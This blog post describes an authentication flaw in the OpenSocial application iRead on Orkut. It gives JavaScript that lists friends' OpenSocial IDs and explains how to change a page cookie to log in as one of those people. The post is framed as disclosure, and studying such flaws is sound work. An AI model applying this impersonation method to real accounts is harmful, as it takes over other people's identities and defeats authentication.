Hacking Opensocial Applicaitons - iRead

For the past week, I was working on an tool that would convert any website to an opensocial application with minimal changes. It was then that I realized that authentication of either the person viewing an application, or the application owner was not trivial. Impersonation was simple, mainly because no secret can really be stored in the application, as discussed here.
I looked up some applications to see how they were looking at authentication and found that they were actually vulnerable! I looked at at iRead on Orkut; they seems closest to nice security, but this post is all about logging in as someone else and breaking it !!
All you have to do is look up Opensocial IDs of people whom you want to impersonate and change the cookie on this page.

To look up the Ids of people, you could execute the following code here.

function getData() { var req = opensocial.newDataRequest(); req.add(req.newFetchPersonRequest(opensocial.DataRequest.PersonId.VIEWER), 'viewer'); req.add(req.newFetchPeopleRequest(opensocial.DataRequest.Group.VIEWER_FRIENDS), 'viewerFriends'); req.send(onLoadFriends); }; function onLoadFriends(dataResponse) { var viewer = dataResponse.get('viewer').getData(); var html = 'Friends of ' + viewer.getDisplayName(); html += ':<br /><ul>'; var viewerFriends = dataResponse.get('viewerFriends').getData(); viewerFriends.each(function(person) { html += '<li>' + person.getDisplayName() + ' = ' + person.getId() + '</li>'; }); html += '</ul>'; document.getElementById('dom_handle').innerHTML = html; };getData()

You should see the Ids of the people on below the code. Pick up any code and change the cookie of http://orkut.weread.com/iread_index.php to log in as the person. Cookies can be changed for a page using the Firefox Web developer toolbar.
I am working on a mechanism to better identify (read authenticate without asking for a password), so watch out the blog for findings. Till then, happy hacking opensocial applications !!